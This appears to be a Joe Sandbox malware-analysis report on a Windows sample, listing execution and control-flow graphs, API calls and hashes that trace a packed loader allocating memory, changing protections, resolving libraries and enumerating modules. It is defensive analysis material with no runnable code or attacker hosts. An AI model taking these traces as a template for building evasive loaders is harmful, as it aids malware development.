                                                                                                                                                                                                                                                                execution_graph 26039 9f003c 26040 9f0049 26039->26040 26054 9f0e0f SetErrorMode SetErrorMode 26040->26054 26045 9f0265 26046 9f02ce VirtualProtect 26045->26046 26048 9f030b 26046->26048 26047 9f0439 VirtualFree 26052 9f05f4 LoadLibraryA 26047->26052 26053 9f04be 26047->26053 26048->26047 26049 9f04e3 LoadLibraryA 26049->26053 26051 9f08c7 26052->26051 26053->26049 26053->26052 26055 9f0223 26054->26055 26056 9f0d90 26055->26056 26057 9f0dad 26056->26057 26058 9f0dbb GetPEB 26057->26058 26059 9f0238 VirtualAlloc 26057->26059 26058->26059 26059->26045 26078 43b068 26079 43b080 26078->26079 26082 43b16e 26079->26082 26084 43a9b0 LdrInitializeThunk 26079->26084 26080 43b23f 26082->26080 26085 43a9b0 LdrInitializeThunk 26082->26085 26084->26082 26085->26080 26086 40b44c 26088 40b45a 26086->26088 26091 40b57c 26086->26091 26087 40b65c 26090 43a950 2 API calls 26087->26090 26088->26087 26088->26088 26088->26091 26092 43a950 26088->26092 26090->26091 26093 43a976 26092->26093 26094 43a995 26092->26094 26095 43a98a 26092->26095 26096 43a968 26092->26096 26098 43a97b RtlReAllocateHeap 26093->26098 26099 438e70 26094->26099 26095->26087 26096->26093 26096->26094 26098->26095 26100 438e83 26099->26100 26101 438e94 26099->26101 26102 438e88 RtlFreeHeap 26100->26102 26101->26095 26102->26101 26103 43aecc 26105 43af00 26103->26105 26104 43af7e 26105->26104 26107 43a9b0 LdrInitializeThunk 26105->26107 26107->26104 26108 afa000 26109 afa03e 26108->26109 26112 afa8e6 26109->26112 26113 afa8f5 26112->26113 26116 afb086 26113->26116 26117 afb0a1 26116->26117 26118 afb0aa CreateToolhelp32Snapshot 26117->26118 26119 afb0c6 Module32First 26117->26119 26118->26117 26118->26119 26120 afa8e5 26119->26120 26121 afb0d5 26119->26121 26123 afad45 26121->26123 26124 afad70 26123->26124 26125 afadb9 26124->26125 26126 afad81 VirtualAlloc 26124->26126 26125->26125 26126->26125 26127 408790 26129 40879f 26127->26129 26128 408970 ExitProcess 26129->26128 26130 4087b4 GetCurrentProcessId GetCurrentThreadId 26129->26130 26133 40887a 26129->26133 26131 4087da 26130->26131 26132 4087de SHGetSpecialFolderPathW GetForegroundWindow 26130->26132 26131->26132 26132->26133 26133->26128 26134 438e51 RtlAllocateHeap 26135 43ab91 26136 43ab9a GetForegroundWindow 26135->26136 26137 43abad 26136->26137

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004087B4
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004087BE
                                                                                                                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00408870
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00408972
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4063528623-0
                                                                                                                                                                                                                                                                • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                • Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 254 43a9b0-43a9e2 LdrInitializeThunk
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: ihgf
                                                                                                                                                                                                                                                                • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                • Opcode ID: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                                                • Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                                • Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                                • Instruction ID: 5bf83162093d809aa6a095f83f940cb60b386281fae2fad957a8694bd2eb5c71
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3911E071608341ABD7149F29DD9067FBBE2EBC2354F14AE2CE59253790C630C841CB4A

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 0 9f003c-9f0047 1 9f004c-9f0263 call 9f0a3f call 9f0e0f call 9f0d90 VirtualAlloc 0->1 2 9f0049 0->2 17 9f028b-9f0292 1->17 18 9f0265-9f0289 call 9f0a69 1->18 2->1 20 9f02a1-9f02b0 17->20 22 9f02ce-9f03c2 VirtualProtect call 9f0cce call 9f0ce7 18->22 20->22 23 9f02b2-9f02cc 20->23 29 9f03d1-9f03e0 22->29 23->20 30 9f0439-9f04b8 VirtualFree 29->30 31 9f03e2-9f0437 call 9f0ce7 29->31 33 9f04be-9f04cd 30->33 34 9f05f4-9f05fe 30->34 31->29 36 9f04d3-9f04dd 33->36 37 9f077f-9f0789 34->37 38 9f0604-9f060d 34->38 36->34 42 9f04e3-9f0505 LoadLibraryA 36->42 40 9f078b-9f07a3 37->40 41 9f07a6-9f07b0 37->41 38->37 43 9f0613-9f0637 38->43 40->41 44 9f086e-9f08be LoadLibraryA 41->44 45 9f07b6-9f07cb 41->45 46 9f0517-9f0520 42->46 47 9f0507-9f0515 42->47 48 9f063e-9f0648 43->48 52 9f08c7-9f08f9 44->52 49 9f07d2-9f07d5 45->49 50 9f0526-9f0547 46->50 47->50 48->37 51 9f064e-9f065a 48->51 53 9f07d7-9f07e0 49->53 54 9f0824-9f0833 49->54 55 9f054d-9f0550 50->55 51->37 56 9f0660-9f066a 51->56 59 9f08fb-9f0901 52->59 60 9f0902-9f091d 52->60 61 9f07e4-9f0822 53->61 62 9f07e2 53->62 58 9f0839-9f083c 54->58 63 9f0556-9f056b 55->63 64 9f05e0-9f05ef 55->64 57 9f067a-9f0689 56->57 67 9f068f-9f06b2 57->67 68 9f0750-9f077a 57->68 58->44 69 9f083e-9f0847 58->69 59->60 61->49 62->54 65 9f056f-9f057a 63->65 66 9f056d 63->66 64->36 70 9f057c-9f0599 65->70 71 9f059b-9f05bb 65->71 66->64 72 9f06ef-9f06fc 67->72 73 9f06b4-9f06ed 67->73 68->48 74 9f084b-9f086c 69->74 75 9f0849 69->75 83 9f05bd-9f05db 70->83 71->83 77 9f06fe-9f0748 72->77 78 9f074b 72->78 73->72 74->58 75->44 77->78 78->57 83->55
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 009F024D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                • Instruction ID: 61c0beff9345d4d30c43a6aeac312f58f61807735dea6f5abac8b0ba57647213
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7526874A01229DFDB64CF58C984BACBBB5BF49304F1480D9E94DAB252DB30AE85DF14

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 123 43ab0b-43ab1f 124 43ab20-43ab7b 123->124 124->124 125 43ab7d-43abce GetForegroundWindow call 43c7d0 124->125
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                • String ID: ilmn
                                                                                                                                                                                                                                                                • API String ID: 2020703349-1560153188
                                                                                                                                                                                                                                                                • Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                                • Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 129 afb086-afb09f 130 afb0a1-afb0a3 129->130 131 afb0aa-afb0b6 CreateToolhelp32Snapshot 130->131 132 afb0a5 130->132 133 afb0b8-afb0be 131->133 134 afb0c6-afb0d3 Module32First 131->134 132->131 133->134 139 afb0c0-afb0c4 133->139 135 afb0dc-afb0e4 134->135 136 afb0d5-afb0d6 call afad45 134->136 140 afb0db 136->140 139->130 139->134 140->135
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00AFB0AE
                                                                                                                                                                                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 00AFB0CE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221850742.0000000000AFA000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AFA000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_afa000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                • Instruction ID: 0175424cc1cd1d8f9135e47ad839635ff6c5805a122812f26a0c83b015ccf82b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99F04F311107186FD7303BE5DC89A7B76FCAF49725F100528F656924C0DB70E8464661

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 142 9f0e0f-9f0e24 SetErrorMode * 2 143 9f0e2b-9f0e2c 142->143 144 9f0e26 142->144 144->143
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,009F0223,?,?), ref: 009F0E19
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,009F0223,?,?), ref: 009F0E1E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                • Instruction ID: 0e5b8a931112bee576b3e274b015f74f183d26d529e2547c9a4b8bb33545403c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EED0123264522CB7DB002A94DC09BDEBB1CDF09BA2F008421FB0DE9081CBB09A4047EA

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 238 43a950-43a961 239 43a976-43a988 call 43bf00 RtlReAllocateHeap 238->239 240 43a995-43a996 call 438e70 238->240 241 43a98a-43a993 call 438e30 238->241 242 43a968-43a96f 238->242 249 43a9a0-43a9a2 239->249 248 43a99b-43a99e 240->248 241->249 242->239 242->240 248->249
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                                • Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 250 43ab91-43aba8 GetForegroundWindow call 43c7d0 253 43abad-43abce 250->253
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2020703349-0
                                                                                                                                                                                                                                                                • Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                • Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 255 438e70-438e7c 256 438e83-438e8e call 43bf00 RtlFreeHeap 255->256 257 438e94-438e95 255->257 256->257
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                • Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                                • Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 260 438e47-438e4a 261 438e51-438e55 RtlAllocateHeap 260->261
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                                • Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                                • Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00AFAD96
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221850742.0000000000AFA000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AFA000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_afa000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                • Instruction ID: a3c0dd47e9463a76504df2df2221f443f17a6fd9990f7200b02361fb67f0ef7b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D113C79A00208EFDB01DF98CA85E99BBF5AF08351F058094FA489B362D771EA50DF90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
                                                                                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
